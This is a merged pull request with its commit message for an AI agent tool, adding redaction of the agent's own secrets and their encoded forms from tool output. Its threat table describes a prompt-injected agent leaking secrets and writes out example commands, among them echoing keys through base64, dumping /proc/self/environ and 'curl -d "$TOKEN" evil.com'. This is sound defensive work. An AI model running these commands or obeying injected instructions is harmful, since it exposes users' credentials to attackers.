fix(redact): close secret-leak gaps on the tool output surface #4

Merged: jkyberneees merged 1 commit into main from fix/redact-known-value-leaks on Jun 3, 2026
@jkyberneees
Contributor

Problem

Tool output is redacted before it enters the transcript/session (internal/loop/loop.go:926), but the matcher is pattern-based — it only catches secrets whose format it recognises. That leaves real leak paths a prompt-injected agent can use:

| Vector | Example | Before |
|---|---|---|
| Bare echo of a non-standard-format secret | echo $TELEGRAM_BOT_TOKEN | leaked (no name= context, shape unknown) |
| Encoded secret | echo $API_KEY \| base64 / xxd / rev | leaked (value no longer matches any regex) |
| /proc environ dump | cat /proc/self/environ | partial |

Scrubbing the process env is not an option — the agent needs its keys (above all the LLM API key) to function. So the fix belongs on the tool output surface.

Fix

A known-value redaction layer that complements the existing format patterns:

  • odek registers its own secrets at startup — resolved API key, Telegram bot token, and env vars with a secret-bearing name segment (config.LoadConfig; FD-supplied key in the subagent path).
  • Those exact values and their common encodings (base64 std/raw/url, hex, percent, reversed) are redacted wherever they appear, regardless of format — closing all three vectors for odek's own secrets.
  • Added a Telegram bot-token format pattern for tokens we don't hold.

Safety of the heuristic:

  • Env-name matching is on whole _/- segments, so GIT_AUTHOR_NAME (AUTH inside AUTHOR) and compass (PASS inside compass) are not treated as secrets.
  • Values under 8 chars are ignored (no over-redaction of ordinary text).
  • Matching is literal (strings.Replacer) — no regex metachar / ReDoS risk from arbitrary secret contents.

Honest limits (documented, not fixed here)

Redaction is a disclosure safety net, not an exfil guarantee. Arbitrary transformations (gzip, openssl enc, char-substitution) and side-channel exfiltration (curl -d "$TOKEN" evil.com, reverse shells, DNS tunnelling) never reach — or bypass — the tool surface, and stay the job of the network-egress controls (network_egress: prompt + non_interactive: deny + the egress denylist). See docs/REDACTION_HARDENING.md for the full threat model and the follow-up roadmap (streaming-boundary redaction, entropy heuristic for third-party secrets, redaction telemetry).

Tests

go test ./internal/redact/ — new coverage in known_value_test.go for each closed vector, env-scan selectivity, and the short-value guard. Touched packages (redact, config, loop, cmd/odek) all pass; go vet clean.

🤖 Generated with Claude Code

Tool output is redacted before it enters the transcript, but the
format-pattern matcher only catches secrets whose shape it recognises.
Three gaps let secrets through:

- a bare echo of a non-standard-format secret (e.g. a Telegram bot
  token, which has no name= context for the generic rule)
- a trivially encoded secret (echo $KEY | base64 / xxd / rev)
- a /proc/self/environ dump (NUL-delimited, no NAME= for the rule)

Add a known-value redaction layer: odek registers its own secrets (the
LLM API key, the Telegram bot token, sensitively-named env vars) at
startup and redacts those exact values plus their common encodings
(base64, hex, percent, reversed), regardless of format. This is the
reliable layer for odek's own secrets; the format patterns stay for
secrets we don't hold but recognise by shape. Also add a Telegram
bot-token pattern.

Env scanning matches whole _/- segments so GIT_AUTHOR_NAME and the like
are not mistaken for secrets; values under 8 chars are ignored to avoid
over-redaction. Matching is literal (strings.Replacer) — no ReDoS risk
from arbitrary secret contents.

The agent process keeps its keys (it needs them to talk to the model);
this only stops them leaking back out through tool output. Side-channel
exfiltration and arbitrary transformations remain the job of the
network-egress controls — documented in docs/REDACTION_HARDENING.md.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
@jkyberneees jkyberneees merged commit 681bcd9 into main Jun 3, 2026
6 checks passed